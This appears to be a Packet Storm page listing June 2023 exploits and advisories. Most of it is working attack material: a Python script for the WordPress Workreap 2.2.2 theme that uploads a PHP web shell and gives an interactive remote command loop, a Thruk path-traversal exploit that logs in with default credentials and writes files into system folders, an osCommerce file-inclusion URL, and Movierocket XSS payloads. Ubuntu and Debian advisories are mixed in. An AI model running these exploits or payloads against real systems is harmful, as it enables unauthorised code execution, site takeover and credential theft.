osCommerce version 4 suffers from a local file inclusion vulnerability.

    ====================================================================================================================================| # Title     : oscommerce V4 LFI Vulnerability                                                                                    || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 102.0.1(64-bit)                                            | | # Vendor    : https://www.oscommerce.com/                                                                                        |  | # Dork      :                                                                                                                    |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Line 62  : https://github.com/osCommerce/osCommerce-V4/blob/main/install/index.php[+] http://locqlhost/install/index.php?rootPath=../../includes/local/configure.phpGreetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet                                     |                                                                                                                                              |=======================================================================================================================================

osCommerce 4 Local File Inclusion

WordPress theme Workreap version 2.2.2 suffers from a remote shell upload vulnerabilities.

    # Exploit Title: WordPress Theme Workreap 2.2.2 - Unauthenticated Upload Leading to Remote Code Execution# Dork: inurl:/wp-content/themes/workreap/# Date: 2023-06-01# Category : Webapps# Vendor Homepage: https://themeforest.net/item/workreap-freelance-marketplace-wordpress-theme/23712454# Exploit Author: Mohammad Hossein Khanaki(Mr_B0hl00l)# Version: 2.2.2# Tested on: Windows/Linux# CVE: CVE-2021-24499import requestsimport randomimport stringimport sysdef usage():    banner = '''    NAME: WordPress Theme Workreap 2.2.2 - Unauthenticated Upload Leading to Remote Code Execution    usage: python3 Workreap_rce.py <URL>     example for linux : python3 Workreap_rce.py https://www.exploit-db.com    example for Windows : python Workreap_rce.py https://www.exploit-db.com    '''    print(f"{BOLD}{banner}{ENDC}")def upload_file(target):    print("[ ] Uploading File")    url = target + "/wp-admin/admin-ajax.php"    body = "<?php echo '" + random_str + "';?>"    data = {"action": "workreap_award_temp_file_uploader"}    response = requests.post(url, data=data, files={"award_img": (file_name, body)})    if '{"type":"success",' in response.text:        print(f"{GREEN}[+] File uploaded successfully{ENDC}")        check_php_file(target)    else:        print(f"{RED}[+] File was not uploaded{ENDC}")def check_php_file(target):    response_2 = requests.get(target + "/wp-content/uploads/workreap-temp/" + file_name)    if random_str in response_2.text:        print(f"{GREEN}The uploaded PHP file executed successfully.{ENDC}")        print("path: " + target +"/wp-content/uploads/workreap-temp/" + file_name)        question = input(f"{YELLOW}Do you want get RCE? [Y/n] {ENDC}")        if question == "y" or question == "Y":            print("[ ] Uploading Shell ")            get_rce(target)        else:            usage()    else:        print(f"{RED}[+] PHP file not allowed on this website. Try uploading another file.{ENDC}")def get_rce(target):    file_name = ''.join(random.choices(string.ascii_lowercase + string.digits, k=8)) + ".php"    body = '<?php $command = $_GET["c"]; $output = shell_exec($command); echo "<pre>\n$output</pre>";?>'    data = {"action": "workreap_award_temp_file_uploader"}    response_3 = requests.post(target + '/wp-admin/admin-ajax.php', data=data, files={"award_img": (file_name, body)})    print(f"{GREEN}[+] Shell uploaded successfully{ENDC}")    while True:        command = input(f"{YELLOW}Enter a command to execute: {ENDC}")        print(f"Shell Path : {target}'/wp-content/uploads/workreap-temp/{BOLD}{file_name}?c={command}{ENDC}")        response_4 = requests.get(target + '/wp-content/uploads/workreap-temp/' + file_name + f"?c={command}")        print(f"{GREEN}{response_4.text}{ENDC}")if __name__ == "__main__":    global GREEN , RED, YELLOW, BOLD, ENDC    GREEN = '\033[92m'    RED = '\033[91m'    YELLOW = '\033[93m'    BOLD = '\033[1m'    ENDC = '\033[0m'    file_name = ''.join(random.choices(string.ascii_lowercase + string.digits, k=8)) + ".php"    random_str = ''.join(random.choices(string.ascii_lowercase + string.digits, k=8))    try:        upload_file(sys.argv[1])    except IndexError:            usage()    except requests.exceptions.RequestException as e:        print("\nPlease Enter Valid Address")

WordPress Workreap 2.2.2 Shell Upload

Proof of concept exploit for a SPARQL injection vulnerability in VIVO that triggers a denial of service.

VIVO SPARQL Injection

Proof of concept exploit for a buffer overflow in strongSwan VPN's charon server.

strongSwan VPN Charon Server Buffer Overflow

Proof of concept exploit for a buffer overflow remote code execution vulnerability in librelp.

librelp Remote Code Execution

Proof of concept exploit for polkit that triggers an eventfd file descriptor leak.

polkit File Descriptor Exhaustion

Ubuntu Security Notice 6152-1 - It was discovered that NFS client's access cache implementation in the Linux kernel caused a severe NFS performance degradation in certain conditions. This updated makes the NFS file-access stale cache behavior to be optional.

==========================================================================  
Ubuntu Security Notice USN-6152-1  
June 08, 2023

linux-gke regression  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

The system could suffer with performance degradation in certain conditions.

Software Description:  
- linux-gke: Linux kernel for Google Container Engine (GKE) systems

Details:

It was discovered that NFS client's access cache implementation in the  
Linux kernel caused a severe NFS performance degradation in certain  
conditions. This updated makes the NFS file-access stale cache behavior  
to be optional.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.04 LTS:  
   linux-image-5.15.0-1035-gke     5.15.0-1035.40  
   linux-image-gke                 5.15.0.1035.34  
   linux-image-gke-5.15            5.15.0.1035.34

Ubuntu 20.04 LTS:  
   linux-image-5.4.0-1101-gke      5.4.0-1101.108  
   linux-image-gke                 5.4.0.1101.106  
   linux-image-gke-5.4             5.4.0.1101.106

After a standard system update you need to reboot your computer to make  
all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have  
been given a new version number, which requires you to recompile and  
reinstall all third party kernel modules you might have installed.  
Unless you manually uninstalled the standard kernel metapackages  
(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,  
linux-powerpc), a standard system upgrade will automatically perform  
this as well.

References:  
   https://ubuntu.com/security/notices/USN-6152-1  
   https://launchpad.net/bugs/2022098

Package Information:  
   https://launchpad.net/ubuntu/+source/linux-gke/5.15.0-1035.40  
   https://launchpad.net/ubuntu/+source/linux-gke/5.4.0-1101.108

Ubuntu Security Notice USN-6152-1

Debian Linux Security Advisory 5422-1 - It was discovered that jupyter-core, the core common functionality for Jupyter projects, could execute arbitrary code in the current working directory while loading configuration files.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256- -------------------------------------------------------------------------Debian Security Advisory DSA-5422-1                   security@debian.orghttps://www.debian.org/security/                                  Aron XuJune 09, 2023                         https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : jupyter-coreCVE ID         : CVE-2022-39286Debian Bug     : 1023361It was discovered that jupyter-core, the core common functionality forJupyter projects, could execute arbitrary code in the current workingdirectory while loading configuration files.For the stable distribution (bullseye), this problem has been fixed inversion 4.7.1-1+deb11u1.We recommend that you upgrade your jupyter-core packages.For the detailed security status of jupyter-core please refer toits security tracker page at:https://security-tracker.debian.org/tracker/jupyter-coreFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQEzBAEBCAAdFiEEhhz+aYQl/Bp4OTA7O1LKKgqv2VQFAmSC094ACgkQO1LKKgqv2VQqmAf7BuaSZZoh8XI6RUFVbwi0NSsFUVY0x4lLIUr49M+qpZoRsUxLAqjeAsqAnLONXNZeqRmL/lCL/4dZ1BvP0D3lW7DaKzP25D9HhamuBMo/8Uvcn/jKhTW+SwXG5qzJoN1XrHHN9ye/yFUd3em+wgZwlOUWVRAICTmnw0s1IA2Z1Urx5qIOD0wphuPwg2QeluVVXlhUDVm8fd0EHi2LupnukIfe4BnPvKtPPrt6wNYxiUEICrXsf21HV/xq07J3MmyJwNmJKw4+GhqDVhcbLW/tWwp51ux+nHXoHOR2GVILwVW1+qp24BOo6ecqG2VldohIy0T8eMebBH9ojICKHT+bpA===S5gL-----END PGP SIGNATURE-----

Debian Security Advisory 5422-1

Movierocket version 1.0 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://www.codester.com/items/32650/                                      ││  Vendor   : Bwiresoft                                                                  ││  Software : Movierocket 1.0                                                            ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /search_catalogGET parameter 'keywords' is vulnerable to RXSShttps://website/search_catalog?keywords=sz83n<script>alert(1)</script>k8jqbPath: /loginGET parameter 'red' is vulnerable to RXSShttps://website/login?red=bol85"><script>alert(1)</script>fdg21 [-] Done

Movierocket 1.0 Cross Site Scripting

Thruk Monitoring Web Interface versions 3.06 and below are affected by a path traversal vulnerability.

    # Exploit Title: Path Traversal Vulnerability in Thruk Monitoring Web Interface ≤ 3.06# Date: 08-Jun-2023# Exploit Author: Galoget Latorre (@galoget)# CVE: CVE-2023-34096 (Galoget Latorre)# Vendor Homepage: https://thruk.org/# Software Link: https://github.com/sni/Thruk/archive/refs/tags/v3.06.zip# Software Link + Exploit + PoC (Backup): https://github.com/galoget/Thruk-CVE-2023-34096# CVE Author Blog: https://galogetlatorre.blogspot.com/2023/06/cve-2023-34096-path-traversal-thruk.html# GitHub Security Advisory: https://github.com/sni/Thruk/security/advisories/GHSA-vhqc-649h-994h# Affected Versions: <= 3.06# Language: Python 3.x# Tested on:#  - Ubuntu 22.04.5 LTS 64-bit#  - Debian GNU/Linux 10 (buster) 64-bit#  - Kali GNU/Linux 2023.1 64-bit#  - CentOS GNU/Linux 8.5.2111 64-bit#!/usr/bin/python3# -*- coding:utf-8 -*-import sysimport warningsimport requestsfrom bs4 import BeautifulSoupfrom termcolor import cprint# Usage: python3 exploit.py <target.site># Example: python3 exploit.py http://127.0.0.1/thruk/# Disable warningswarnings.filterwarnings('ignore')# Set headersheaders = {    "User-Agent": "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36"}def banner():    """    Function to print the banner    """    banner_text = """ __     __     __   __  __  __      __        __   __   __  /  \\  /|_  __   _) /  \\  _)  _) __   _) |__| /  \\ (__\\ /__  \\__ \\/ |__     /__ \\__/ /__ __)     __)    | \\__/  __/ \\__)                                                                Path Traversal Vulnerability in Thruk Monitoring Web Interface ≤ 3.06Exploit & CVE Author: Galoget Latorre (@galoget)LinkedIn: https://www.linkedin.com/in/galoget"""    print(banner_text)def usage_instructions():    """    Function that validates the number of arguments.    The application MUST have 2 arguments:    - [0]: Name of the script    - [1]: Target URL (Thruk Base URL)    """    if len(sys.argv) != 2:        print("Usage: python3 exploit.py <target.site>")        print("Example: python3 exploit.py http://127.0.0.1/thruk/")        sys.exit(0)def check_vulnerability(thruk_version):    """    Function to check if the recovered version is vulnerable to CVE-2023-34096.    Prints additional information about the vulnerability.    """    try:        if float(thruk_version[1:5]) <= 3.06:            if float(thruk_version[4:].replace("-", ".")) < 6.2:                cprint("[+] ", "green", attrs=['bold'], end = "")                print("This version of Thruk is ", end = "")                cprint("VULNERABLE ", "red", attrs=['bold'], end = "")                print("to CVE-2023-34096!")                print(" |  CVE Author Blog: https://galogetlatorre.blogspot.com/2023/06/cve-2023-34096-path-traversal-thruk.html")                print(" |  GitHub Security Advisory: https://github.com/sni/Thruk/security/advisories/GHSA-vhqc-649h-994h")                print(" |  CVE MITRE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-34096")                print(" |  CVE NVD NIST: https://nvd.nist.gov/vuln/detail/CVE-2023-34096")                print(" |  Thruk Changelog: https://www.thruk.org/changelog.html")                print(" |  Fixed version: 3.06-2+")                print("")                return True            else:                cprint("[-] ", "red", attrs=['bold'], end = "")                print("It looks like this version of Thruk is NOT VULNERABLE to CVE-2023-34096.")                return False    except:        cprint("[-] ", "red", attrs=['bold'], end = "")        print("There was an error parsing Thruk's version.\n")        return Falsedef get_thruk_version():    """    Function to get Thruk's version via web scraping.    It also verifies the title of the website to check if the target is a Thruk instance.    """    response = requests.get(target, headers=headers, allow_redirects=True, verify=False, timeout=10)    html_soup = BeautifulSoup(response.text, "html.parser")    if "<title>Thruk Monitoring Webinterface</title>" not in response.text:        cprint("[-] ", "red", attrs=['bold'], end = "")        print("Verify if the URL is correct and points to a Thruk Monitoring Web Interface.")        sys.exit(-1)    else:        # Extract version anchor tag        version_link = html_soup.find_all("a", {"class": "link text-sm"})        if len(version_link) == 1 and version_link[0].has_attr('href'):            thruk_version = version_link[0].text.strip()            cprint("[+] ", "green", attrs=['bold'], end = "")            print(f"Detected Thruk Version (Public Banner): {thruk_version}\n")            return thruk_version        else:            cprint("[-] ", "red", attrs=['bold'], end = "")            print("There was an error retrieving Thruk's version.")            sys.exit(-1)def get_error_info():    """    Function to cause an error in the target Thruk instance and collect additional information via web scraping.    """    # URL that will cause an error    error_url = target + "//cgi-bin/login.cgi"    # Retrieve Any initial Cookies    error_response = requests.get(error_url,                                  headers=headers,                                  allow_redirects=False,                                  verify=False,                                  timeout=10)    cprint("[*] ", "blue", attrs=['bold'], end = "")    print("Trying to retrieve additional information...\n")    try:        # Search for the error tag        html_soup = BeautifulSoup(error_response.text, "html.parser")        error_report = html_soup.find_all("pre", {"class": "text-left mt-5"})[0].text        if len(error_report) > 0:            # Print Error Info            error_report = error_report[error_report.find("Version"):error_report.find("\n\nStack")]            cprint("[+] ", "green", attrs=['bold'], end = "")            print("Recovered Information: \n")            parsed_error_report = error_report.split("\n")            for error_line in parsed_error_report:                print(f"     {error_line}")    except:        cprint("[-] ", "red", attrs=['bold'], end = "")        print("No additional information available.\n")def get_thruk_session_auto_login():    """    Function to login into the Thruk instance and retrieve a valid session.    It will use default Thruk's credentials available here:    - https://www.thruk.org/documentation/install.html        Change credentials if required.    """    # Default Credentials - Change if required    username = "thrukadmin" # CHANGE ME    password = "thrukadmin" # CHANGE ME    params = {"login": username, "password": password}    cprint("[*] ", "blue", attrs=['bold'], end = "")    print(f"Trying to autenticate with provided credentials: {username}/{password}\n")    # Define Login URL    login_url = "cgi-bin/login.cgi"    session = requests.Session()    # Retrieve Any initial Cookies    session.get(target, headers=headers, allow_redirects=True, verify=False)    # Login and get thruk_auth Cookie    session.post(target + login_url, data=params, headers=headers, allow_redirects=False, verify=False)    # Get Cookies as dictionary    cookies = session.cookies.get_dict()    # Successful Login    if cookies.get('thruk_auth') is not None:        cprint("[+] ", "green", attrs=['bold'], end = "")        print("Successful Authentication!\n")        cprint("[+] ", "green", attrs=['bold'], end = "")        print(f"Login Cookie: thruk_auth={cookies.get('thruk_auth')}\n")        return session    # Failed Login    else:        if cookies.get('thruk_message') == "fail_message~~login%20failed":            cprint("[-] ", "red", attrs=['bold'], end = "")            print("Login Failed, check your credentials.")            sys.exit(401)def cve_2023_34096_exploit_path_traversal(logged_session):    """    Function that attempts to exploit the Path Traversal Vulnerability.    The exploit will try to upload a PoC file to multiple common folders.    This to prevent permissions errors to cause false negatives.    """    cprint("[*] ", "blue", attrs=['bold'], end = "")    print("Trying to exploit: ", end = "")    cprint("CVE-2023-34096 - Path Traversal\n", "yellow", attrs=['bold'])    # Define Upload URL    upload_url = "cgi-bin/panorama.cgi"    # Absolute paths    common_folders = ["/tmp/",                      "/etc/thruk/plugins/plugins-enabled/",                      "/etc/thruk/panorama/",                      "/etc/thruk/bp/",                      "/etc/thruk/thruk_local.d/",                      "/var/www/",                      "/var/www/html/",                      "/etc/",    ]    # Upload PoC file to each folder    for target_folder in common_folders:        # PoC file extension is jpg due to regex validations of Thruk.        # Nevertheless this issue can still cause damage in different ways to the affected instance.        files = {'image': ("exploit.jpg", "CVE-2023-34096-Exploit-PoC-by-galoget")}        data = {"task": "upload",                "type": "image",                "location": f"backgrounds/../../../..{target_folder}"        }        upload_response = logged_session.post(target + upload_url,                                    data=data,                                    files=files,                                    headers=headers,                                    allow_redirects=False,                                    verify=False)        try:            upload_response = upload_response.json()            if upload_response.get("msg") == "Upload successfull" and upload_response.get("success") is True:                cprint("[+] ", "green", attrs=['bold'], end = "")                print(f"File successfully uploaded to folder: {target_folder}{files.get('image')[0]}\n")            elif upload_response.get("msg") == "Fileupload must use existing and writable folder.":                cprint("[-] ", "red", attrs=['bold'], end = "")                print(f"File upload to folder \'{target_folder}{files.get('image')[0]}\' failed due to write permissions or non-existent folder!\n")            else:                cprint("[-] ", "red", attrs=['bold'], end = "")                print("File upload failed.\n")        except:            cprint("[-] ", "red", attrs=['bold'], end = "")            print("File upload failed.\n")if __name__ == "__main__":    banner()    usage_instructions()    # Change this with the domain or IP address to attack    if sys.argv[1] and sys.argv[1].startswith("http"):        target = sys.argv[1]    else:        target = "http://127.0.0.1/thruk/"    # Prepare Base Target URL    if not target.endswith('/'):        target += "/"    cprint("[+] ", "green", attrs=['bold'], end = "")    print(f"Target URL: {target}\n")    # Get Thruk version via web scraping    scraped_thruk_version = get_thruk_version()    # Send a request that will generate an error and collect extra info    get_error_info()    # Check if the instance is vulnerable to CVE-2023-34096    vulnerable_status = check_vulnerability(scraped_thruk_version)    if vulnerable_status:        cprint("[+] ", "green", attrs=['bold'], end = "")        print("The Thruk version found in this host is vulnerable to CVE-2023-34096. Do you want to try to exploit it?")        # Confirm exploitation        option = input("\nChoice (Y/N): ").lower()        print("")        if option == "y":            cprint("[*] ", "blue", attrs=['bold'], end = "")            print("The tool will attempt to exploit the vulnerability by uploading a PoC file to common folders...\n")            # Login into Thruk instance            valid_session = get_thruk_session_auto_login()            # Exploit Path Traversal Vulnerability            cve_2023_34096_exploit_path_traversal(valid_session)        elif option == "n":            cprint("[*] ", "blue", attrs=['bold'], end = "")            print("No exploitation attempts were performed, Goodbye!\n")            sys.exit(0)        else:            cprint("[-] ", "red", attrs=['bold'], end = "")            print("Unknown option entered.")            sys.exit(1)    else:        cprint("[-] ", "red", attrs=['bold'], end = "")        print("The current Thruk's version is NOT VULNERABLE to CVE-2023-34096.")        sys.exit(2)

Source

Packet Storm